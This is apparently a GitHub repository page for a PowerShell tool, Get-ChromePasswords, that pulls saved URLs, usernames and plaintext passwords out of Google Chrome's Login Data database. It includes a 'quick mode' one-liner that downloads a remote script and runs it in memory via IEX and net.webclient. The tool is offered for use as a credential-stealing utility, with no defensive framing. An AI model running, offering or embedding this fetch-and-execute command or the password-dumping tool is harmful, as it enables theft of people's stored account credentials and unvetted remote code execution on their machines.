z3v2cicidi / Get-ChromePasswords

Get chrome passwords from chrome database in powershell

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Get-ChromePasswords

.Synopsis
  Quickly retrieve Google Chrome passwords using powershell (please note this creates sqlite assemblies in your temp directory)

.PARAMETER Path
  
  The optional path to a non-standard database location for the Google Chrome Login Data database.  Generally found at '<APPDATA>\Local\Google\Chrome\Default\Login Data'

.EXAMPLE
  PS> .\Get-ChromePasswords

  Url                                                                                                    Username                  Password
  ---                                                                                                    --------                  --------
  https://accounts.google.com/signin/challenge/sl/password                                               user1                     password
  ...

Quick mode...

  PS C:\> IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/et0x/Get-ChromePasswords/master/Get-ChromePasswords.ps1"))

About

Get chrome passwords from chrome database in powershell


Languages

Language:PowerShell 100.0%